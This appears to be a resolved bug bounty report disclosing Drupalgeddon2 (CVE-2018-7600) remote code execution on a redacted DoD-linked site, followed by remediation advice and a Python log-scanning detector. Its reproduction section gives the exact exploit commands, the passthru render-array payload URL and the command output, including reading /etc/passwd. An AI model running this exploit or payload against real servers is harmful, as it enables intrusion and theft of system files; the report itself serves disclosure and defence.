[CVE-2018-7600] Remote Code Execution due to outdated Drupal server on www.█████████
High
Vulnerability Details
## Summary
Due to an outdated Drupal version, remote code execution is possible on `www.█████` via CVE-2018-7600.
## Description
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
Vulnerable Host:
* `www.███`
Visiting `https://www.███/███` shows a Drupal installation at version 7.54, last updated on 2017-02-01.
Several critical and highly critical vulnerabilities are known for this version (see `https://api.drupal.org/api/drupal/████████/7.x` and `https://www.drupal.org/security`). Among them is `SA-CORE-2018-002` (CVE-2018-7600), which I demonstrate here.
Note: I am reporting this here, since the page `https://www.███████` seems to belong to the █████████, which belongs to the DOD. The footer further states: `██████. [...]`
## Step-by-step Reproduction Instructions
1. Download the git repository with the exploit: `git clone https://github.com/dreadlocked/Drupalgeddon2.git && cd Drupalgeddon2`
* Install dependencies if necessary: `gem install nokogiri`
2. Run the exploit with ruby `ruby drupalgeddon2-customizable-beta.rb -u https://www.████████/ -v 7 -c id --form user/login`
Parameters explanation:
```
-u, --url URL Service URL
-v, --version VERSION Target Drupal version {7,8}
-c, --command COMMAND Command to execute
--form Form to attack, by default '/user/password' in Drupal 7
```
The above command outputs:
```
root@5b08dc005375:/Drupalgeddon2# ruby drupalgeddon2-customizable-beta.rb -u https://www.████/ -v 7 -c id --form user/login
drupalgeddon2-customizable-beta.rb:184: warning: URI.escape is obsolete
[i] Requesting: www.███████//user/password/?name[%23post_render][]=passthru&name[%23markup]=id&name[%23type]=markup
[i] POST: form_id=user_pass&_triggering_element_name=name
[i] 200
[*] Obtained build id!: ████████
drupalgeddon2-customizable-beta.rb:220: warning: URI.escape is obsolete
drupalgeddon2-customizable-beta.rb:221: warning: URI.escape is obsolete
[i] Requesting: www.█████/file/ajax/name/%23value/██████
[i] POST: form_build_id=█████
[i] Response code: 200
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
root@5b08dc005375:/Drupalgeddon2#
```
As we can see, the `id` command executed successfully and returned `uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0`, i.e. commands run as the `apache` web server user inside the SELinux `httpd_t` domain.
I am also providing the contents of `/etc/passwd`, which I obtained with the command
```
ruby drupalgeddon2-customizable-beta.rb -u https://www.██████/ -v 7 -c "cat /etc/passwd" --form user/login
```
Output:
```
████
██████
███████
████████
█████████
█████████
██████████
███
████
█████████
██████████
████
██████████
████████ █████
█████████
██████████
████████
██████████
██████
████
█████████
███████
███████
████
██████████
███
█████
█████
██████
```
## Resources
* https://api.drupal.org/api/drupal/█████/7.x
* https://www.drupal.org/security
* https://github.com/dreadlocked/Drupalgeddon2
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600
* https://www.drupal.org/sa-core-2018-002
## Mitigation/Remediation Actions
Upgrade to the most recent Drupal 7 core release; SA-CORE-2018-002 is fixed in 7.58 and later, while the host is still on 7.54. Because this vulnerability has been exploited in the wild with public tooling since 2018, the host should also be checked for signs of earlier compromise (unexpected files under the web root, modified core files, unusual cron entries, and access-log requests carrying `%23`-encoded render-array parameters such as the ones in the output above) before it is trusted again.
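To support both sides of that remediation, here is an added example (written for this report, not part of Drupal or of the Drupalgeddon2 exploit) that checks a Drupal core version against the fixed releases listed in the description and scans combined-format access logs for the two request shapes the exploit run above produced: the stage-1 query string carrying Form API render-array properties (`name[%23post_render][]=...`) and the stage-2 `/file/ajax/.../%23value/<form_build_id>` callback. The sample log lines, IP addresses, host and form build ID are constructed; the render-array property list is the set of Form API keys an attacker can smuggle, and a literal `#` in a path or query string is a strong indicator on its own, since browsers treat `#` as the fragment delimiter and never send it.

```python
"""Added example: detect Drupalgeddon2 (CVE-2018-7600) attempts in access logs
and check whether a Drupal core version predates SA-CORE-2018-002.
Illustrative code only; not part of the exploit or of Drupal core."""
import re
from urllib.parse import unquote, parse_qsl

# Fixed releases named in SA-CORE-2018-002: 7.58, 8.3.9, 8.4.6, 8.5.1.
FIXED_7 = (7, 58)
FIXED_8 = {3: (8, 3, 9), 4: (8, 4, 6), 5: (8, 5, 1)}

# Form API render-array properties that the exploit injects through user input.
RENDER_PROPS = ("post_render", "pre_render", "lazy_builder", "access_callback",
                "markup", "type", "value", "children")
PROP_RE = re.compile(r"#(" + "|".join(RENDER_PROPS) + r")\b")
# Drupal 7 stage 2: POST /file/ajax/<element path>/#value/<form_build_id>
STAGE2_RE = re.compile(r"^/+file/ajax/.+/#value/", re.I)

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_version(v):
    """'7.54' -> (7, 54); '8.5.0' -> (8, 5, 0). Suffixes such as '-dev' are ignored."""
    return tuple(int(p) for p in re.findall(r"\d+", v.split("-")[0]))


def vulnerable_to_sa_core_2018_002(version):
    """True when the given Drupal core version is older than the fixed release."""
    v = parse_version(version)
    if not v:
        return False
    if v[0] == 7:
        return v < FIXED_7
    if v[0] == 8:
        minor = v[1] if len(v) > 1 else 0
        if minor < 3:                       # 8.0.x-8.2.x: unsupported, never fixed
            return True
        if minor in FIXED_8:
            return (v + (0, 0))[:3] < FIXED_8[minor]
        return False                        # 8.6+ shipped after the fix
    return False                            # 6.x and earlier are out of scope here


def inspect_request(target):
    """Return the set of Drupalgeddon2 indicators found in one request target."""
    # Split before decoding: a decoded '#' would otherwise be read as a fragment.
    raw_path, _, raw_query = target.partition("?")
    indicators = set()
    if STAGE2_RE.search(unquote(raw_path)):
        indicators.add("stage2:file/ajax callback")
    # parse_qsl decodes %23 -> '#' in both names and values, so
    # name[%23post_render][]=passthru becomes name[#post_render][].
    for key, val in parse_qsl(raw_query, keep_blank_values=True):
        for m in PROP_RE.finditer(key + "=" + val):
            indicators.add("stage1:#" + m.group(1))
    return indicators


def scan_log(lines):
    """Return (ip, method, target, status, sorted indicators) for suspicious lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        found = inspect_request(m["target"])
        if found:
            hits.append((m["ip"], m["method"], m["target"], int(m["status"]), sorted(found)))
    return hits


# Constructed sample log (addresses, host and build ID are made up), modelled
# on the two requests the exploit issued in the reproduction above.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jan/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 5120',
    '203.0.113.5 - - [05/Jan/2021:10:00:02 +0000] "POST //user/password/?name[%23post_render][]=passthru&name[%23markup]=id&name[%23type]=markup HTTP/1.1" 200 2048',
    '203.0.113.5 - - [05/Jan/2021:10:00:03 +0000] "POST /file/ajax/name/%23value/form-AbCdEf123 HTTP/1.1" 200 310',
    '198.51.100.7 - - [05/Jan/2021:10:00:04 +0000] "GET /user/password?name=alice HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    print("7.54 vulnerable:", vulnerable_to_sa_core_2018_002("7.54"))
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Stage-1 detection relies on the query string because the injected render array travels there, as the `[i] Requesting:` line in the exploit output shows; POST bodies (`form_id`, `form_build_id`) are normally not logged. A `200` on a stage-2 `/file/ajax/.../#value/` request followed by command output in the response size is the point at which the host should be treated as compromised rather than merely probed.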
## Impact
Critical - Remote Code Execution
Report Stats
- Report ID: 1063256
- State: Closed
- Substate: resolved
- Upvotes: 19